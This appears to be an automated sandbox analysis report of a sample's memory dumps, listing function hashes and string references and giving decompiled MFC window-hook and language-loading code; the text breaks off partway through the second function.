Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: ,Z5
API String ID: 0-4106833681
Opcode ID: 7468b1e32bd1de8360a6edb02d66f19abb9650767705ecbe6a96a84363701d8d
Instruction ID: 15c7e7999a26b0cead0701c4029e4be47ef641b21fdf23bfe0bed9b4c1a77f06
Opcode Fuzzy Hash: 7468b1e32bd1de8360a6edb02d66f19abb9650767705ecbe6a96a84363701d8d
Instruction Fuzzy Hash: DB31A8B2A083528FD708DF15D54441BFAE0BBD4308F004E2DE59AA6220D3B5EA0DCF83

Uniqueness

Uniqueness Score: -1.00%

Function 047265A1, Relevance: 1.3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

@F{, xrefs: 04726605

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: @F{
API String ID: 0-3996062949
Opcode ID: 69b36ab09a6facc11244c765111eeaf99ef7e5d3c06b2f4756847a6479eb7ff3
Instruction ID: 0efd50781d99ed5eee7d9199fa713d45e4638a42c34723819589ef1609e6b4ce
Opcode Fuzzy Hash: 69b36ab09a6facc11244c765111eeaf99ef7e5d3c06b2f4756847a6479eb7ff3
Instruction Fuzzy Hash: 2321E875E0020CEBEF08DFA5C94AADEBBB2FB84314F10C199E514AB290E7B55B518F50

Uniqueness

Uniqueness Score: -1.00%

Function 0472CE30, Relevance: 1.3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

Strings

SB, xrefs: 0472CE9C

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: SB
API String ID: 0-4240390251
Opcode ID: 407e980cda6ce9b1b81d243125cac87bff1ef989a057c2365db79ddede5f3b2f
Instruction ID: 910817b840e42edc9e8453f6944904544b7071c9a9e898a480253e8b1e903b8f
Opcode Fuzzy Hash: 407e980cda6ce9b1b81d243125cac87bff1ef989a057c2365db79ddede5f3b2f
Instruction Fuzzy Hash: 4921F4B1C02319FBDF54DFE5CA0A4DEBBB1FB41318F209599D415A6260D3B51B14EB80

Uniqueness

Uniqueness Score: -1.00%

Function 0473848F, Relevance: 1.3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

<^g, xrefs: 047384F7

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: <^g
API String ID: 0-1542056183
Opcode ID: 3532c0a322ad9df1670977f3a47b046cade5c955560bb58ecf35f48ce8918f35
Instruction ID: adf40d33065f97430aad1279d60fbe256a45782dc825a122c05584ca036b2376
Opcode Fuzzy Hash: 3532c0a322ad9df1670977f3a47b046cade5c955560bb58ecf35f48ce8918f35
Instruction Fuzzy Hash: F1213975800219FFCF05DFA4C90989EBBB5FF44318F10C588E826AB210C3B2A624DF90

Uniqueness

Uniqueness Score: -1.00%

Function 047424FA, Relevance: 1.3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

i{N, xrefs: 0474250A

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: i{N
API String ID: 0-3857245463
Opcode ID: 5b067dff1b5bb4d84c375e216cf0f09e9850e4ccf3a05c4703cc826ed6ab71cd
Instruction ID: 024adc9de5705a2eea3fada101792fb460f3905609c45dd40d316486b6259fbc
Opcode Fuzzy Hash: 5b067dff1b5bb4d84c375e216cf0f09e9850e4ccf3a05c4703cc826ed6ab71cd
Instruction Fuzzy Hash: 0621FD75D0120EEBDF48CFE5C94A4EEBBB0BB04308F608598D021B6250C7B82B49DF85

Uniqueness

Uniqueness Score: -1.00%

Function 10014DF1, Relevance: .4, Instructions: 384COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction ID: d843150002b5fdbee4540e758fa1fdf932bb3bc374cd8b2a2bf52660f7a0d0cb
Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction Fuzzy Hash: B0D17E77C0A9F34A8376C52D446822AEAE2AFC16D131FC3E0DCD43F2999A379D9195D0

Uniqueness

Uniqueness Score: -1.00%

Function 100149D1, Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction ID: b0e252b4210876cd4fd8023ef7f4298814fc228ebf42669cbf69ede80cf776e3
Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction Fuzzy Hash: 88D17D77C0A9F30A8376C52D446822AEAA2EFD15D131BC3E0DCD43F2A9DA36DD8195D0

Uniqueness

Uniqueness Score: -1.00%

Function 100145C5, Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction ID: 06b2d36a3c40a3f479f3aa8e5914f692225ab3edd5c0d52574ced45d39a8f0ca
Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction Fuzzy Hash: F3C18E77C0A9F30A8376C52D446812EEAA2EFD29D131BC3E1CCD43F2999A36DD8595D0

Uniqueness

Uniqueness Score: -1.00%

Function 100141F1, Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction ID: 1c20f07d7db350df234ac4ac4761bd18738192d3eac2cae87490958d567b3520
Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction Fuzzy Hash: 0DC17E77D0A9B30A8376C52D446822AEEE2EFD15C131BC3A0DCE43F299D936DD8595D0

Uniqueness

Uniqueness Score: -1.00%

Function 0473CED5, Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c95074f6583590a3c39c51631d12d1133f2c49908be887cde4c3c53a39a148b7
Instruction ID: ff516e26685a048ef1b44db25e61fa15bf7175d4b9bde663a1b073307dafee7c
Opcode Fuzzy Hash: c95074f6583590a3c39c51631d12d1133f2c49908be887cde4c3c53a39a148b7
Instruction Fuzzy Hash: 548167B29093418FD364CF29D58940BBBF0BBD4748F054A2DF59A96221E3B1DA49CF83

Uniqueness

Uniqueness Score: -1.00%

Function 0473B0DD, Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efb7782f081de7589f878638138b2ff6e4d6760b88ec5db7df3d3b738de01f85
Instruction ID: 8f3a84617083f09f7f9a0c0c133d71be4a590f21c31c2e71322cb22c12208a7d
Opcode Fuzzy Hash: efb7782f081de7589f878638138b2ff6e4d6760b88ec5db7df3d3b738de01f85
Instruction Fuzzy Hash: A05159716083018FC358DF25E68542FBBE1FBC9758F004A1DF589AA262C771AA49CF53

Uniqueness

Uniqueness Score: -1.00%

Function 047275A9, Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca50c99622ac2af0c40792427d795d4bd119387cdc68295688330a1830ad6320
Instruction ID: ee3cd22c222dd2a2d3246e2cc162135fb891312cd65132b748b93fa4e95da508
Opcode Fuzzy Hash: ca50c99622ac2af0c40792427d795d4bd119387cdc68295688330a1830ad6320
Instruction Fuzzy Hash: 514167B16083028FD718DF26CA4982BBBE5FBC4358F14492CF49596311D375EA09CF96

Uniqueness

Uniqueness Score: -1.00%

Function 04737AF5, Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d99186777e76297588745f38f2374a6e08703855ea072cc3c8dd826d94476fd
Instruction ID: 1d5466986cd0aa4eee3f934e7bfcad1d5a45309395d34627ac34a335f6634b64
Opcode Fuzzy Hash: 1d99186777e76297588745f38f2374a6e08703855ea072cc3c8dd826d94476fd
Instruction Fuzzy Hash: 21316772A183219FC314CF29C88586BF7E0FF88714F414A2EE88697351D730EA09CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0472C8D3, Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 386cac54e32f5fe1dbbf2a6d63cfe0b0c33edc1c12b09152af3e47cfa505bb44
Instruction ID: 07ad3578ec85174dfb80d9578a8ce5b4a12681930efb9fdb8c12565de8fda659
Opcode Fuzzy Hash: 386cac54e32f5fe1dbbf2a6d63cfe0b0c33edc1c12b09152af3e47cfa505bb44
Instruction Fuzzy Hash: 8831D676D00208FFEF05DFA5C9099DEBBB2FF58314F108149F91466260D7B29A259F80

Uniqueness

Uniqueness Score: -1.00%

Function 0472ED39, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1df823c46666f92163a515b3a40f6bc6d531cb117538bbd422f3f12448690ea1
Instruction ID: 29793c6ce313c5526a0226f8cccc4b772ea26636607e7b45fff6fff2ebc22a7d
Opcode Fuzzy Hash: 1df823c46666f92163a515b3a40f6bc6d531cb117538bbd422f3f12448690ea1
Instruction Fuzzy Hash: 2421F071D0021DABDF44CFE5C94A8EEFBB5FB44314F208199D121B2260D3B94A59CF91

Uniqueness

Uniqueness Score: -1.00%

Function 04738389, Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0997e7f28b855f366210b47902f42bf8a062d0fe2c9e5889643e817a162c0595
Instruction ID: ed20504fcb967a481457b27f787718c44bbc5849c423717f1319d5bfb2e8e7c6
Opcode Fuzzy Hash: 0997e7f28b855f366210b47902f42bf8a062d0fe2c9e5889643e817a162c0595
Instruction Fuzzy Hash: D721EEBAD0030AEBCF54DFE0C94A4EEBBB1BB54308F208288C51176260D3B90A46CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0473DDCA, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.349428169.0000000004721000.00000020.00000001.sdmp, Offset: 04720000, based on PE: true

Associated: 00000002.00000002.349421840.0000000004720000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349483987.0000000004745000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.349492564.0000000004747000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 1000AE41, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E1000AE41(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
				intOrPtr _t54;
				signed int _t56;
				signed int _t59;
				long _t60;
				signed int _t64;
				void* _t66;
				signed int _t72;
				signed int _t74;
				signed int _t76;
				long _t83;
				signed int _t86;
				signed short _t87;
				signed int _t88;
				int _t94;
				void* _t106;
				long* _t108;
				long _t110;
				signed int _t111;
				CHAR* _t112;
				intOrPtr _t113;
				void* _t116;
				void* _t119;
				intOrPtr _t120;

				_t119 = __eflags;
				_t105 = __edi;
				_push(0x148);
				E100139E1(E10025892, __ebx, __edi, __esi);
				_t110 =  *(_t116 + 0x10);
				_t94 =  *(_t116 + 0xc);
				_push(0x10005749);
				 *(_t116 - 0x120) = _t110;
				_t54 = E10010B49(_t94, 0x100569f0, __edi, _t110, _t119);
				_t120 = _t54;
				_t97 = 0 | _t120 == 0x00000000;
				 *((intOrPtr*)(_t116 - 0x11c)) = _t54;
				_t121 = _t120 == 0;
				if(_t120 == 0) {
					_t54 = E1000572D(_t94, _t97, __edi, _t110, _t121);
				}
				if( *(_t116 + 8) == 3) {
					_t106 =  *_t110;
					_t111 =  *(_t54 + 0x14);
					_t56 =  *(E10006DEC(_t94, _t106, _t111, __eflags) + 0x14) & 0x000000ff;
					 *(_t116 - 0x124) = _t56;
					__eflags = _t111;
					if(_t111 != 0) {
						L7:
						__eflags =  *0x10058774;
						if( *0x10058774 == 0) {
							L12:
							__eflags = _t111;
							if(__eflags == 0) {
								__eflags =  *0x1005838c;
								if( *0x1005838c != 0) {
									L19:
									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x1005838c; // 0x0
									if(__eflags != 0) {
										L23:
										_t59 = GetWindowLongA(_t94, 0xfffffffc);
										 *(_t116 - 0x14) = _t59;
										__eflags = _t59;
										if(_t59 != 0) {
											_t112 = "AfxOldWndProc423";
											_t64 = GetPropA(_t94, _t112);
											__eflags = _t64;
											if(_t64 == 0) {
												SetPropA(_t94, _t112,  *(_t116 - 0x14));
												_t66 = GetPropA(_t94, _t112);
												__eflags = _t66 -  *(_t116 - 0x14);
												if(_t66 ==  *(_t116 - 0x14)) {
													GlobalAddAtomA(_t112);
													SetWindowLongA(_t94, 0xfffffffc, E1000ACF4);
												}
											}
										}
										L27:
										_t105 =  *((intOrPtr*)(_t116 - 0x11c));
										_t60 = CallNextHookEx( *(_t105 + 0x28), 3, _t94,  *(_t116 - 0x120));
										__eflags =  *(_t116 - 0x124);
										_t110 = _t60;
										if( *(_t116 - 0x124) != 0) {
											UnhookWindowsHookEx( *(_t105 + 0x28));
											_t50 = _t105 + 0x28;
											 *_t50 =  *(_t105 + 0x28) & 0x00000000;
											__eflags =  *_t50;
										}
										goto L30;
									}
									goto L27;
								}
								_t113 = 0x30;
								E10013A90(_t106, _t116 - 0x154, 0, _t113);
								 *((intOrPtr*)(_t116 - 0x154)) = _t113;
								_push(_t116 - 0x154);
								_push("#32768");
								_push(0);
								_t72 = E10008037(_t94, _t97, _t106, "#32768", __eflags);
								 *0x1005838c = _t72;
								__eflags = _t72;
								if(_t72 == 0) {
									_t74 = GetClassNameA(_t94, _t116 - 0x118, 0x100);
									__eflags = _t74;
									if(_t74 == 0) {
										goto L23;
									}
									 *((char*)(_t116 - 0x19)) = 0;
									_t76 = E10012FBA(_t116 - 0x118, "#32768");
									__eflags = _t76;
									if(_t76 == 0) {
										goto L27;
									}
									goto L23;
								}
								goto L19;
							}
							E10006E38(_t116 - 0x18, __eflags,  *((intOrPtr*)(_t111 + 0x1c)));
							 *(_t116 - 4) =  *(_t116 - 4) & 0x00000000;
							E1000958B(_t111, _t94);
							 *((intOrPtr*)( *_t111 + 0x50))();
							_t108 =  *((intOrPtr*)( *_t111 + 0xf8))();
							_t83 = SetWindowLongA(_t94, 0xfffffffc, E10009C90);
							__eflags = _t83 - E10009C90;
							if(_t83 != E10009C90) {
								 *_t108 = _t83;
							}
							 *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) & 0x00000000;
							 *(_t116 - 4) =  *(_t116 - 4) | 0xffffffff;
							__eflags =  *(_t116 - 0x14);
							if( *(_t116 - 0x14) != 0) {
								_push( *(_t116 - 0x18));
								_push(0);
								E1000661C();
							}
							goto L27;
						}
						_t86 = GetClassLongA(_t94, 0xffffffe6);
						__eflags = _t86 & 0x00010000;
						if((_t86 & 0x00010000) != 0) {
							goto L27;
						}
						_t87 =  *(_t106 + 0x28);
						__eflags = _t87 - 0xffff;
						if(_t87 <= 0xffff) {
							 *(_t116 - 0x18) = 0;
							GlobalGetAtomNameA( *(_t106 + 0x28) & 0x0000ffff, _t116 - 0x18, 5);
							_t87 = _t116 - 0x18;
						}
						_t88 = E100081BA(_t87, "ime");
						_pop(_t97);
						__eflags = _t88;
						if(_t88 == 0) {
							goto L27;
						}
						goto L12;
					}
					__eflags =  *(_t106 + 0x20) & 0x40000000;
					if(( *(_t106 + 0x20) & 0x40000000) != 0) {
						goto L27;
					}
					__eflags = _t56;
					if(_t56 != 0) {
						goto L27;
					}
					goto L7;
				} else {
					CallNextHookEx( *(_t54 + 0x28),  *(_t116 + 8), _t94, _t110);
					L30:
					return E10013A64(_t94, _t105, _t110);
				}
			}

0x1000ae41
0x1000ae41
0x1000ae41
0x1000ae4b
0x1000ae50
0x1000ae53
0x1000ae56
0x1000ae60
0x1000ae66
0x1000ae6d
0x1000ae6f
0x1000ae72
0x1000ae78
0x1000ae7a
0x1000ae7c
0x1000ae7c
0x1000ae85
0x1000ae9a
0x1000ae9c
0x1000aea4
0x1000aea8
0x1000aeae
0x1000aeb0
0x1000aec7
0x1000aec7
0x1000aece
0x1000af1b
0x1000af1b
0x1000af1d
0x1000af85
0x1000af8d
0x1000afc9
0x1000afd5
0x1000afdc
0x1000b00e
0x1000b011
0x1000b017
0x1000b01a
0x1000b01c
0x1000b024
0x1000b02b
0x1000b02d
0x1000b02f
0x1000b036
0x1000b03e
0x1000b040
0x1000b043
0x1000b046
0x1000b054
0x1000b054
0x1000b043
0x1000b02f
0x1000b05a
0x1000b060
0x1000b06c
0x1000b072
0x1000b079
0x1000b07b
0x1000b080
0x1000b086
0x1000b086
0x1000b086
0x1000b086
0x00000000
0x1000b08a
0x00000000
0x1000afde
0x1000af91
0x1000af9c
0x1000afa7
0x1000afad
0x1000afb3
0x1000afb4
0x1000afb6
0x1000afbe
0x1000afc4
0x1000afc7
0x1000afed
0x1000aff3
0x1000aff5
0x00000000
0x00000000
0x1000afff
0x1000b003
0x1000b00a
0x1000b00c
0x00000000
0x00000000
0x00000000
0x1000b00c
0x00000000
0x1000afc7
0x1000af25
0x1000af2a
0x1000af31
0x1000af3a
0x1000af50
0x1000af52
0x1000af58
0x1000af5a
0x1000af5c
0x1000af5c
0x1000af64
0x1000af68
0x1000af6c
0x1000af70
0x1000af76
0x1000af79
0x1000af7b
0x1000af7b
0x00000000
0x1000af70
0x1000aed3
0x1000aed9
0x1000aede
0x00000000
0x00000000
0x1000aee4
0x1000aee7
0x1000aeec
0x1000aef9
0x1000aefd
0x1000af03
0x1000af03
0x1000af0c
0x1000af12
0x1000af13
0x1000af15
0x00000000
0x00000000
0x00000000
0x1000af15
0x1000aeb2
0x1000aeb9
0x00000000
0x00000000
0x1000aebf
0x1000aec1
0x00000000
0x00000000
0x00000000
0x1000ae87
0x1000ae8f
0x1000b08c
0x1000b091
0x1000b091

APIs

__EH_prolog3_GS.LIBCMT ref: 1000AE4B

Part of subcall function 10010B49: __EH_prolog3.LIBCMT ref: 10010B50

CallNextHookEx.USER32 ref: 1000AE8F

Part of subcall function 1000572D: __CxxThrowException@8.LIBCMT ref: 10005743
Part of subcall function 1000572D: __EH_prolog3.LIBCMT ref: 10005750

GetClassLongA.USER32 ref: 1000AED3
GlobalGetAtomNameA.KERNEL32 ref: 1000AEFD
SetWindowLongA.USER32(?,000000FC,Function_00009C90), ref: 1000AF52
_memset.LIBCMT ref: 1000AF9C
GetClassLongA.USER32 ref: 1000AFCC
GetClassNameA.USER32(?,?,00000100), ref: 1000AFED
GetWindowLongA.USER32 ref: 1000B011
GetPropA.USER32 ref: 1000B02B
SetPropA.USER32(?,AfxOldWndProc423,?), ref: 1000B036
GetPropA.USER32 ref: 1000B03E
GlobalAddAtomA.KERNEL32 ref: 1000B046
SetWindowLongA.USER32(?,000000FC,Function_0000ACF4), ref: 1000B054
CallNextHookEx.USER32 ref: 1000B06C
UnhookWindowsHookEx.USER32(?), ref: 1000B080

Strings

ime, xrefs: 1000AF06
AfxOldWndProc423, xrefs: 1000B024, 1000B029, 1000B034, 1000B03C, 1000B045
#32768, xrefs: 1000AFAE, 1000AFB3, 1000AFFD

Memory Dump Source

Source File: 00000002.00000002.350446311.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.350428084.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350473647.0000000010027000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.350500022.0000000010031000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350505898.0000000010033000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.350553752.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350562317.0000000010058000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.350569854.000000001005B000.00000002.00020000.sdmp Download File

Similarity

API ID: Long$ClassHookPropWindow$AtomCallGlobalH_prolog3NameNext$Exception@8H_prolog3_ThrowUnhookWindows_memset
String ID: #32768$AfxOldWndProc423$ime
API String ID: 1191297049-4034971020
Opcode ID: ca7888dfb0c71fc0401e6ba70262fa19f56f660d1a9385c029036613102bdb6a
Instruction ID: 1c38c3c18bcc7d65163b88f5105384c9fa02f60523b38c3317b7273a594727a5
Opcode Fuzzy Hash: ca7888dfb0c71fc0401e6ba70262fa19f56f660d1a9385c029036613102bdb6a
Instruction Fuzzy Hash: C761A075900626EBEB21DF60CC49BAF7BB8FF043A1F110254F919A6195CB34DA81CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000E207, Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 158
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E1000E207(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t61;
				_Unknown_base(*)()* _t62;
				struct HINSTANCE__* _t63;
				struct HINSTANCE__* _t76;
				unsigned int _t79;
				signed short _t87;
				unsigned int _t88;
				_Unknown_base(*)()* _t95;
				signed short _t97;
				unsigned int _t98;
				signed int _t106;
				signed int _t118;
				signed int _t127;
				void* _t130;

				_push(0x15c);
				E100139E1(E10025A64, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t130 - 0x124)) =  *((intOrPtr*)(_t130 + 8));
				_t123 = 0;
				 *((intOrPtr*)(_t130 - 0x130)) =  *((intOrPtr*)(_t130 + 0xc));
				 *(_t130 - 0x120) = 0;
				 *(_t130 - 0x11c) = 0;
				_t61 = GetModuleHandleA("kernel32.dll");
				_t106 = GetProcAddress;
				 *(_t130 - 0x134) = _t61;
				_t62 = GetProcAddress(_t61, "GetUserDefaultUILanguage");
				if(_t62 == 0) {
					_t63 = GetModuleHandleA("ntdll.dll");
					if(_t63 != 0) {
						 *(_t130 - 0x120) = 0;
						EnumResourceLanguagesA(_t63, 0x10, 1, E1000DB23, _t130 - 0x120);
						if( *(_t130 - 0x120) != 0) {
							_t79 =  *(_t130 - 0x120) & 0x0000ffff;
							_t123 = _t79 & 0x3ff;
							 *((intOrPtr*)(_t130 - 0x148)) = ConvertDefaultLocale(_t79 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t123);
							 *((intOrPtr*)(_t130 - 0x144)) = ConvertDefaultLocale(_t123);
							 *(_t130 - 0x11c) = 2;
						}
					}
				} else {
					_t87 =  *_t62() & 0x0000ffff;
